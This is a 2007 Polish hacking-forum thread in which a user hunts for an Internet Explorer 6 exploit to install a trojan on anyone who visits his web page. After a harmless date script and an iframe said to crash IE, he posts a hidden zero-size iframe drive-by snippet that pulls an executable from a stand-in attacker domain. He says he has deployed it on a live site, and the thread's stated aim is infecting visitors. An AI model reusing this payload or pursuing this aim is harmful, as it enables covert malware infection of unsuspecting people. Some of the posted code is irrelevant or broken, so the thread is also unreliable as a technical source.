Exploit na IE 6 + SP2?

[Uriel]

Witam wyczytałem w tym temacie:

http://www.haker.com.pl/forum/viewtopic.php?t=14651&postdays=0&postorder=asc&highlight=downloader&start=45

Że jest exploit napisany w javascript umożliwiający wsadzenie ofierze trojana gdy wejdzie na strone. Wysiliłem się troszkę i coś znalazłem w necie ale nie jestem pewien czy to to.
Mam nadzieje że to ten kod ale nie znam się na tym i dlatego zwracam się do mądrzejszych w tym o de mnie o skomentowanie tego skryptu, a więc wygląda on tak:

<script type="text/jscript">
function init() {
document.write("The time is: " + Date() );

}
window.onload = init;
</script>[/b]

<h1>Something before</h1>

the JavaScript... Blablalbla

<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );

}
window.onload = init;
</script>

And something after the JavaScript... Blablablablabla[/b]

 

[PHmaster]

to raczej nic nie da, ten skrypt po kilku sekundach zmienia ztronę x na y, gdzie wyświetlana jest data i czas

[ Dodano: 07-06-2007, 20:34 ]
tu masz lepszy skrypcik na IE

<iframe src=" ? ">

zawiesza każdą wersję IE (sprawdzałem do 6.)

 

[Uriel]

No ale dzienki niemu nie wwale trojana do kompa

[ Dodano: 07-06-2007, 23:26 ]
No znalazlem jeszcze cos....

<html>
<body>
<iframe src='http://your.domain.com/NOTEPAD.EXE?.htm' name="NotFound" width="0" height="0"></iframe>
Click here.
</body>
</html>[/b]

Wydaje mi się że chyba działa.... wrzuciłem to na strone(bez AV nie wchódźcie!):
http://fajnefotki4.republika.pl/

No i chyba się pobiera tylko nie wiem czy instaluje itp, ponieważ później zpauzowałem AV i niby mi sie nie uruchomiło to a jak go później włączyłem to zaczeły mi sie pojawiac komunikaty że ktos exploitem mnie atakuje oto screeny:

Myslicie że to ja czy ktoś sobie z tym exploitem jaja robił?